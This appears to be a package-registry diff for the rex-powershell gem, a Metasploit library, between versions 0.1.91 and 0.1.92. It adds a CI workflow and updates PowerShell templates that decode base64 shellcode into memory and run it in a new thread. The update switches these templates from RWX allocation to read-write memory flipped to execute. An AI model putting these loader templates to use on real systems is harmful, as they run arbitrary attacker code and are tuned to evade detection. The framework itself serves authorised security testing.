rex-powershell 0.1.91 → 0.1.92
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- checksums.yaml +4 -4
- checksums.yaml.gz.sig +0 -0
- data.tar.gz.sig +0 -0
- data/.github/workflows/verify.yml +57 -0
- data/data/templates/to_mem_dotnet.ps1.template +10 -5
- data/data/templates/to_mem_pshreflection.ps1.template +17 -15
- data/lib/rex/powershell/payload.rb +2 -3
- data/lib/rex/powershell/version.rb +1 -1
- metadata +3 -2
- metadata.gz.sig +0 -0
checksums.yaml
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
---
|
|
2
2
|
SHA256:
|
|
3
|
-
metadata.gz:
|
|
4
|
-
data.tar.gz:
|
|
3
|
+
metadata.gz: 546de61fbb5ce6c1291c1c922c68db93a408ae3c1fc339acdabc80d2b905f961
|
|
4
|
+
data.tar.gz: ac1f52f00b5df0ffd34813e5aed34a61ee52da12269173f5a6ff792a01f3c336
|
|
5
5
|
SHA512:
|
|
6
|
-
metadata.gz:
|
|
7
|
-
data.tar.gz:
|
|
6
|
+
metadata.gz: ce407f2b61f7ccecdfc42ce1bf797e68d2ef3b7a88717735da432e92d9cff2c9511b8a1a0639bf987140076da7a0ccd141f2e5588252c11058d49467b033467e
|
|
7
|
+
data.tar.gz: efd9530029b6909fa9c7fe9daff2e59ce5167dbf5b25cb3cf67f816aa5528a7589c4b462516d823d429ce508e74cb6aa3be329157ee95eed1a1269b5bd743bd0
|
checksums.yaml.gz.sig
CHANGED
|
Binary file
|
data.tar.gz.sig
CHANGED
|
Binary file
|
|
@@ -0,0 +1,57 @@
|
|
|
1
|
+
name: Verify
|
|
2
|
+
|
|
3
|
+
on:
|
|
4
|
+
push:
|
|
5
|
+
branches:
|
|
6
|
+
- '*'
|
|
7
|
+
pull_request:
|
|
8
|
+
branches:
|
|
9
|
+
- '*'
|
|
10
|
+
|
|
11
|
+
jobs:
|
|
12
|
+
test:
|
|
13
|
+
runs-on: ubuntu-18.04
|
|
14
|
+
timeout-minutes: 40
|
|
15
|
+
|
|
16
|
+
strategy:
|
|
17
|
+
fail-fast: true
|
|
18
|
+
matrix:
|
|
19
|
+
ruby:
|
|
20
|
+
- 2.5
|
|
21
|
+
- 2.6
|
|
22
|
+
- 2.7
|
|
23
|
+
- 3.0
|
|
24
|
+
test_cmd:
|
|
25
|
+
- bundle exec rspec
|
|
26
|
+
|
|
27
|
+
env:
|
|
28
|
+
RAILS_ENV: test
|
|
29
|
+
|
|
30
|
+
name: Ruby ${{ matrix.ruby }} - ${{ matrix.test_cmd }}
|
|
31
|
+
steps:
|
|
32
|
+
- name: Checkout code
|
|
33
|
+
uses: actions/checkout@v2
|
|
34
|
+
|
|
35
|
+
- uses: actions/setup-ruby@v1
|
|
36
|
+
with:
|
|
37
|
+
ruby-version: ${{ matrix.ruby }}
|
|
38
|
+
|
|
39
|
+
- name: Setup bundler
|
|
40
|
+
run: |
|
|
41
|
+
gem install bundler
|
|
42
|
+
- uses: actions/cache@v2
|
|
43
|
+
with:
|
|
44
|
+
path: vendor/bundle
|
|
45
|
+
key: ${{ runner.os }}-gems-${{ hashFiles('**/Gemfile.lock') }}
|
|
46
|
+
restore-keys: |
|
|
47
|
+
${{ runner.os }}-gems-
|
|
48
|
+
- name: Bundle install
|
|
49
|
+
run: |
|
|
50
|
+
bundle config path vendor/bundle
|
|
51
|
+
bundle install --jobs 4 --retry 3
|
|
52
|
+
- name: ${{ matrix.test_cmd }}
|
|
53
|
+
run: |
|
|
54
|
+
echo "${CMD}"
|
|
55
|
+
bash -c "${CMD}"
|
|
56
|
+
env:
|
|
57
|
+
CMD: ${{ matrix.test_cmd }}
|
|
@@ -5,9 +5,10 @@ $%{var_syscode} = @"
|
|
|
5
5
|
namespace %{var_kernel32} {
|
|
6
6
|
public class func {
|
|
7
7
|
[Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
|
|
8
|
-
[Flags] public enum MemoryProtection {
|
|
8
|
+
[Flags] public enum MemoryProtection { ReadWrite = 0x04, Execute= 0x10 }
|
|
9
9
|
[Flags] public enum Time : uint { Infinite = 0xFFFFFFFF }
|
|
10
10
|
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
|
|
11
|
+
[DllImport("kernel32.dll")] public static extern bool VirtualProtect(IntPtr lpAddress, int dwSize, int flNewProtect,out int lpflOldProtect);
|
|
11
12
|
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
|
|
12
13
|
[DllImport("kernel32.dll")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds);
|
|
13
14
|
}
|
|
@@ -21,10 +22,14 @@ $%{var_compileParams}.GenerateInMemory = $True
|
|
|
21
22
|
$%{var_output} = $%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams}, $%{var_syscode})
|
|
22
23
|
|
|
23
24
|
[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
|
|
25
|
+
[Uint32]$%{var_opf} = 0
|
|
24
26
|
|
|
25
|
-
$%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::
|
|
27
|
+
$%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::ReadWrite)
|
|
26
28
|
if ([Bool]!$%{var_baseaddr}) { $global:result = 3; return }
|
|
27
29
|
[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_baseaddr}, $%{var_code}.Length)
|
|
28
|
-
|
|
29
|
-
if ([
|
|
30
|
-
$%{
|
|
30
|
+
|
|
31
|
+
if ([%{var_kernel32}.func]::VirtualProtect($%{var_baseaddr},[Uint32]$%{var_code}.Length + 1, [%{var_kernel32}.func+MemoryProtection]::Execute, [Ref]$%{var_opf}) -eq $true ) {
|
|
32
|
+
[IntPtr] $%{var_threadHandle} = [%{var_kernel32}.func]::CreateThread(0,0,$%{var_baseaddr},0,0,0)
|
|
33
|
+
if ([Bool]!$%{var_threadHandle}) { $global:result = 7; return }
|
|
34
|
+
$%{var_temp} = [%{var_kernel32}.func]::WaitForSingleObject($%{var_threadHandle}, [%{var_kernel32}.func+Time]::Infinite)
|
|
35
|
+
}
|
|
@@ -1,27 +1,29 @@
|
|
|
1
1
|
function %{func_get_proc_address} {
|
|
2
|
-
|
|
3
|
-
|
|
2
|
+
Param ($%{var_module}, $%{var_procedure})
|
|
3
|
+
$%{var_unsafe_native_methods} = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
|
|
4
4
|
|
|
5
|
-
|
|
5
|
+
return $%{var_unsafe_native_methods}.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($%{var_unsafe_native_methods}.GetMethod('GetModuleHandle')).Invoke($null, @($%{var_module})))), $%{var_procedure}))
|
|
6
6
|
}
|
|
7
7
|
|
|
8
8
|
function %{func_get_delegate_type} {
|
|
9
|
-
|
|
10
|
-
|
|
11
|
-
|
|
12
|
-
|
|
9
|
+
Param (
|
|
10
|
+
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $%{var_parameters},
|
|
11
|
+
[Parameter(Position = 1)] [Type] $%{var_return_type} = [Void]
|
|
12
|
+
)
|
|
13
13
|
|
|
14
|
-
|
|
15
|
-
|
|
16
|
-
|
|
14
|
+
$%{var_type_builder} = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
|
|
15
|
+
$%{var_type_builder}.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
|
|
16
|
+
$%{var_type_builder}.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $%{var_return_type}, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
|
|
17
17
|
|
|
18
|
-
|
|
18
|
+
return $%{var_type_builder}.CreateType()
|
|
19
19
|
}
|
|
20
20
|
|
|
21
21
|
[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
|
|
22
|
+
[Uint32]$%{var_opf} = 0
|
|
23
|
+
$%{var_buffer} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualAlloc), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $%{var_code}.Length,0x3000, 0x04)
|
|
22
24
|
|
|
23
|
-
$%{var_buffer} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualAlloc), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $%{var_code}.Length,0x3000, 0x40)
|
|
24
25
|
[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_buffer}, $%{var_code}.length)
|
|
25
|
-
|
|
26
|
-
$%{var_hthread} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll CreateThread), (%{func_get_delegate_type} @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$%{var_buffer},[IntPtr]::Zero,0,[IntPtr]::Zero)
|
|
27
|
-
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll WaitForSingleObject), (%{func_get_delegate_type} @([IntPtr], [Int32]))).Invoke($%{var_hthread},0xffffffff) | Out-Null
|
|
26
|
+
if (([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualProtect), (%{func_get_delegate_type} @([IntPtr], [UIntPtr], [UInt32], [UInt32].MakeByRefType()) ([Bool]))).Invoke($%{var_buffer}, [Uint32]$%{var_code}.Length, 0x10, [Ref]$%{var_opf})) -eq $true) {
|
|
27
|
+
$%{var_hthread} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll CreateThread), (%{func_get_delegate_type} @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$%{var_buffer},[IntPtr]::Zero,0,[IntPtr]::Zero)
|
|
28
|
+
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll WaitForSingleObject), (%{func_get_delegate_type} @([IntPtr], [Int32]))).Invoke($%{var_hthread},0xffffffff) | Out-Null
|
|
29
|
+
}
|
|
@@ -37,10 +37,10 @@ module Payload
|
|
|
37
37
|
def self.to_win32pe_psh(template_path = TEMPLATE_DIR, code)
|
|
38
38
|
hash_sub = {}
|
|
39
39
|
hash_sub[:var_code] = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
40
|
-
hash_sub[:var_win32_func]
|
|
40
|
+
hash_sub[:var_win32_func] = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
41
41
|
hash_sub[:var_payload] = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
42
42
|
hash_sub[:var_size] = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
43
|
-
hash_sub[:var_rwx]
|
|
43
|
+
hash_sub[:var_rwx] = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
44
44
|
hash_sub[:var_iter] = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
45
45
|
hash_sub[:var_syscode] = Rex::Text.rand_text_alpha(rand(8)+8)
|
|
46
46
|
|
|
@@ -55,7 +55,6 @@ module Payload
|
|
|
55
55
|
# Originally from PowerSploit
|
|
56
56
|
#
|
|
57
57
|
def self.to_win32pe_psh_reflection(template_path = TEMPLATE_DIR, code)
|
|
58
|
-
# Intialize rig and value names
|
|
59
58
|
rig = Rex::RandomIdentifier::Generator.new(DEFAULT_RIG_OPTS)
|
|
60
59
|
rig.init_var(:func_get_proc_address)
|
|
61
60
|
rig.init_var(:func_get_delegate_type)
|
metadata
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
|
2
2
|
name: rex-powershell
|
|
3
3
|
version: !ruby/object:Gem::Version
|
|
4
|
-
version: 0.1.
|
|
4
|
+
version: 0.1.92
|
|
5
5
|
platform: ruby
|
|
6
6
|
authors:
|
|
7
7
|
- Metasploit Hackers
|
|
@@ -93,7 +93,7 @@ cert_chain:
|
|
|
93
93
|
EknWpNgVhohbot1lfVAMmIhdtOVaRVcQQixWPwprDj/ydB8ryDMDosIMcw+fkoXU
|
|
94
94
|
9GJsSaSRRYQ9UUkVL27b64okU8D48m8=
|
|
95
95
|
-----END CERTIFICATE-----
|
|
96
|
-
date: 2021-07-
|
|
96
|
+
date: 2021-07-19 00:00:00.000000000 Z
|
|
97
97
|
dependencies:
|
|
98
98
|
- !ruby/object:Gem::Dependency
|
|
99
99
|
name: rake
|
|
@@ -173,6 +173,7 @@ executables: []
|
|
|
173
173
|
extensions: []
|
|
174
174
|
extra_rdoc_files: []
|
|
175
175
|
files:
|
|
176
|
+
- ".github/workflows/verify.yml"
|
|
176
177
|
- ".gitignore"
|
|
177
178
|
- ".rspec"
|
|
178
179
|
- ".travis.yml"
|
metadata.gz.sig
CHANGED
|
Binary file
|